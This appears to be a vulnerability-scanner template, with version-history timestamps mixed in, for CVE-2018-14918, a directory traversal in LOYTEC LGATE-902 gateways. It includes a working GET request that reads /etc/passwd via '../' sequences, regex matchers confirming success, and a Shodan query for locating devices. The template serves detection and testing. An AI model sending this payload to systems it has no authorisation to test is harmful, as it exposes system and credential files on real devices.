2022-06-16 09:02:28 +00:00
id : CVE-2018-14918
info :
name : LOYTEC LGATE-902 6.3.2 - Directory Traversal
author : 0x_Akoko
severity : high
2022-06-17 06:23:14 +00:00
description : |
The path traversal (CVE-2018-14918) allow an attacker to manipulate path references and access files and directories (including critical system files) that are stored outside the root folder of the web application running on the device. This can be used to read and configuration files containing, e.g., usernames and passwords.
2022-06-16 09:02:28 +00:00
reference :
- https://seclists.org/fulldisclosure/2019/Apr/12
- https://www.cvedetails.com/cve/CVE-2018-14918/
2022-06-20 04:56:43 +00:00
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
2022-06-16 09:02:28 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2018-14918
cwe-id : CWE-22
2022-06-17 06:23:14 +00:00
metadata :
shodan-query : http.html:"LGATE-902"
2022-06-20 04:56:43 +00:00
verified : "true"
2022-06-17 06:23:14 +00:00
tags : cve,cve2018,lgate,loytec,lfi
2022-06-16 09:02:28 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
matchers :
- type : regex
2022-06-17 06:23:14 +00:00
part : body
2022-06-16 09:02:28 +00:00
regex :
- "root:.*:0:0:"
2022-06-17 06:23:14 +00:00
- type : status
status :
- 200